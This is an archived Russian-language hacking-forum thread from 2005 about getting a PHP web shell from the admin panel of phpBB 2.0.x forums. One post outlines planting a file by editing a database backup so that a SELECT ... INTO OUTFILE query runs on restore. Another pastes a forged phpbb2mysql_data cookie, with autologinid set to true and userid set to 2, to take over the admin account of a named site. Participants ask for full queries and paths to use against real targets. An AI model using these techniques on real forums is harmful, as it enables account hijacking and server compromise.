Можно ли получить php шелл из админки phpbb 2.0.1x? [Архив]

Просмотр полной версии : Можно ли получить php шелл из админки phpbb 2.0.1x?

[TSH]Corpse

06.03.2005, 13:14

Можно ли получить php шелл из админки phpbb 2.0.1x?

KEZ

06.03.2005, 13:22

Не из 2.0.1 не из 2.0.13 не из админки какого либо другого форума phpBB веб шелл получить нельзя.

Хотя у меня есть альтернативные варианты.
Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется

3pricol3

06.03.2005, 20:04

по поваду взлома Взлом phpBB 2.0.12

3pricol3 (15:31) :
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D
это написано в куке мозилки переделываю на
3pricol3 (15:31) :
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
и ничего не меняется
3pricol3 (15:31) :
почему я что то нетак делаю?
и я запуталась?

max_pain89

06.03.2005, 22:14

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D
phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
и ничего не меняется
3pricol3 (15:31) :
почему я что то нетак делаю?
и я запуталась?
Ты просто дурак

Mega_GnoM

07.03.2005, 00:02

как узнать какая директория имеет право на запись ?
и вообще поподробнее как это реализовать ?

coyl

07.03.2005, 03:26

Ты говорил про строку типа:
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
У меня такой вопрос - как грамотно прописать путь к папке, в которую идет запись, если я не знаю, где лежат файлы самого сайта, т.е. полный путь(типа home/.../www/forum) указать не могу

[Tsh] *CorPSe*

07.03.2005, 04:03

Kez > Не мог бы написать полный запрос?
Я в мускулах 0 .. т.е учу но результаты мизерные.